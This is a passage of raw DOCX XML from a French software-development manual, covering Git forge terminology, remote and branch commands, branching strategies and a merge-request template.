      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une forge héberge des dépôts et ajoute la collaboration : revues, tickets, intégration continue, gestion des droits. Les principales sont GitHub, GitLab, Bitbucket et Gitea. Le vocabulaire diffère, les concepts sont identiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.174 — Cinq concepts et leur nom selon la forge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257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Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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GitLab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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Gitea</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Proposition de changement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2189"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pull Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2189"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Merge Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pull Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Registre d'images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2189"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GHCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2189"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Packages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Tickets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Wiki</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2189"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Wiki</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2189"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Wiki</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Wiki</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes de configuration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Dépôt distant</w:t>
        <w:br/>
        <w:t>git remote -v</w:t>
        <w:br/>
        <w:t>git remote add origin git@github.com:organisation/projet.git</w:t>
        <w:br/>
        <w:t>git remote set-url origin git@github.com:organisation/nouveau.git</w:t>
        <w:br/>
        <w:br/>
        <w:t># Branche de suivi</w:t>
        <w:br/>
        <w:t>git push -u origin feature/menu</w:t>
        <w:br/>
        <w:t>git branch -vv</w:t>
        <w:br/>
        <w:t>git fetch --prune origin</w:t>
      </w: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SSH PLUTÔT QUE HTTPS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une clé SSH évite de saisir un jeton à chaque envoi. Générez une paire dédiée par machine, protégez la clé privée par une phrase secrète et ajoutez uniquement la clé publique à la forge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>51.2 Stratégies de branches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois modèles dominent. Le choix dépend du rythme de livraison, du nombre de contributeurs et du besoin de versions maintenues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.175 — Trois modèles de branches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25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Modèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="410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Principe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Adapté à</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GitHub Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4109"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> toujours déployable, branches courtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Livraison continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Git Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="410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develop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>release/*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hotfix/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Versions planifiées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trunk-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4109"/>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Commits fréquents sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, drapeaux de fonctionnalité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Équipes matures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="61" name="Picture 61"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f59.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.59 — GitHub Flow en cinq étapes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Nommer et borner les branches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Une branche par intention, nommée clairement</w:t>
        <w:br/>
        <w:t>git switch -c feat/menu-clavier</w:t>
        <w:br/>
        <w:t>git switch -c fix/contraste-bouton</w:t>
        <w:br/>
        <w:t>git switch -c chore/maj-dependances</w:t>
        <w:br/>
        <w:br/>
        <w:t># Durée de vie cible : moins de trois jours</w:t>
        <w:br/>
        <w:t># Une branche de trois semaines est un conflit en attente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le modèle importe moins que la discipline : une branche qui vit trop longtemps diverge, et sa fusion devient un événement risqué plutôt qu'une routine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>51.3 La demande de fusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une demande de fusion bien rédigée réduit le temps de revue et documente la décision. Quatre éléments suffisent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une demande de fusion complète · markdown</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Objectif</w:t>
        <w:br/>
        <w:t>Permettre l'ouverture du menu au clavier et annoncer son état.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Changements</w:t>
        <w:br/>
        <w:t>- `aria-expanded` mis à jour à l'ouverture et à la fermeture</w:t>
        <w:br/>
        <w:t>- Échap referme et rend le focus au bouton</w:t>
        <w:br/>
        <w:t>- Trois tests de composant ajoutés</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Vérifications</w:t>
        <w:br/>
        <w:t>- [x] `npm run lint`</w:t>
        <w:br/>
        <w:t>- [x] `npm test`</w:t>
        <w:br/>
        <w:t>- [x] parcours clavier manuel</w:t>
        <w:br/>
        <w:t>- [x] Lighthouse accessibilité ≥ 95</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Captures</w:t>
        <w:br/>
        <w:t>&lt;!-- avant / après sur mobile et bureau --&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>Closes #42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.176 — Cinq sections et leurs pièges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28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Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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357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Erreur fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2289"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pourquoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Changements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
